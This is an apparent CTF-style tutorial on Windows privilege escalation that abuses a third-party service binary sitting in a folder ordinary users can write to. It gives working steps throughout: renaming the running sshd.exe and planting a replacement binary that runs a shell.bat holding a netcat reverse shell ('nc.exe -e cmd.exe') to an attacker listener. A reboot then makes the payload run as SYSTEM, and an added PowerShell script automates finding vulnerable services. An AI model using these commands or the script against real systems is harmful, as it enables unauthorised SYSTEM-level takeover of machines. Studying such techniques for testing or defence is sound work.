In this post we discuss the first method of exploiting a weak service: abusing its service binary path. The target here is the service executable and the permissions that ordinary (non-admin) users hold on the folder it lives in.
1. First, check which user we are running as.
2. List the groups that our user "hackerctf" belongs to:
net user hackerctf
3. Enumerate every service together with its binary path, using PowerShell:
$service = Get-WmiObject -Query 'select * from win32_service'; $service | Select-Object Name, PathName
4. Never pick a service whose binary is svchost.exe (or any other Windows binary under System32); look for third-party software instead. Here we choose the running ssh service as our target.
5. Check whether we can enter the directory that holds the ssh service executable.
6. Run cmd.exe so that the remaining steps can be carried out from a cmd shell.
7. Inspect the permissions on the executable's folder, and check whether the service is set to start automatically at boot.
Then try to copy sshd.exe to a new file, sshd2.exe, inside the service folder.
The copy succeeds, so the service folder is writable by other users. The service is running, however, so we cannot delete the running sshd.exe or overwrite it with our payload. Instead we rename it: Windows lets a loaded executable be renamed even though it refuses to let it be deleted or overwritten while it runs.
8. Rename sshd.exe to sshd1.exe:
rename sshd.exe sshd1.exe
9. Now build the payload for the final exploitation.
10. We use nc.exe for the reverse shell and create a shell.bat file that runs nc.exe.
11. Run the command below to write the reverse shell command into shell.bat (192.168.1.3:4002 is our listener):
cmd.exe /c "echo c:\Users\Public\OpenSSH\nc.exe -e cmd.exe 192.168.1.3 4002 > shell.bat"
12. Now we only need to create a replacement sshd.exe on our Kali box and upload it into the target's ssh service folder.
13. We compile our sshd.exe for Windows with mingw.
14. Download the malicious sshd.exe directly into the ssh service folder.
15. Restart the system. The target service is set to start automatically, so at boot the Service Control Manager starts it under its service account (SYSTEM here), and our replacement sshd.exe runs with those privileges. Our low-privilege shell has no right to stop or start the service itself, so we reboot the machine instead:
shutdown /r /t 0
16. After the restart
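The enumeration and checks from steps 3 to 7, collected into one PowerShell script. This is an added example and not code from the original post; it assumes Windows PowerShell 5.1 (where Get-WmiObject is still available) and that probing a folder by creating and deleting a temporary file is acceptable on the target. The column names and the probe file name are the example's own choices.

```powershell
# Added example, not part of the original post. Run from the low-privileged shell.
# Assumes Windows PowerShell 5.1 so that Get-WmiObject is available.

# Services whose binaries live here are Windows components (svchost.exe among
# them) and are skipped, as the post advises.
$skipRoots = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64")

$results = foreach ($svc in Get-WmiObject -Class Win32_Service) {
    if (-not $svc.PathName) { continue }

    # PathName may be quoted and may carry arguments; keep only the .exe part.
    if ($svc.PathName -match '^"?(.*?\.exe)') { $exe = $Matches[1] } else { continue }
    $dir = Split-Path -Parent $exe
    if ($skipRoots | Where-Object { $dir -like "${_}*" }) { continue }

    # Folder check, done the way the post does it: try to create a file there.
    $probe = Join-Path $dir ('probe_{0}.tmp' -f [guid]::NewGuid())
    $dirWritable = $false
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        $dirWritable = $true
    } catch { }

    # Binary check: a running service binary is locked, so this is usually False
    # even when the folder is writable. That is the situation the rename trick handles.
    $exeWritable = $false
    try {
        $fs = [IO.File]::Open($exe, [IO.FileMode]::Open, [IO.FileAccess]::Write, [IO.FileShare]::ReadWrite)
        $fs.Dispose()
        $exeWritable = $true
    } catch { }

    [pscustomobject]@{
        Name        = $svc.Name
        State       = $svc.State
        StartMode   = $svc.StartMode
        RunsAs      = $svc.StartName
        Binary      = $exe
        DirWritable = $dirWritable
        ExeWritable = $exeWritable
    }
}

# Candidates: a writable folder is enough (rename the running binary, drop ours),
# and Auto start means the payload runs at the next boot without needing rights
# to restart the service ourselves.
$results | Where-Object { $_.DirWritable -and $_.StartMode -eq 'Auto' } |
    Format-Table Name, State, StartMode, RunsAs, Binary, ExeWritable -AutoSize
```

A row with DirWritable True, ExeWritable False, StartMode Auto and RunsAs LocalSystem is exactly the sshd case in the post. The RunsAs column matters as much as StartMode: a service that starts automatically but runs as a low-privileged virtual account gives you nothing beyond what you already have.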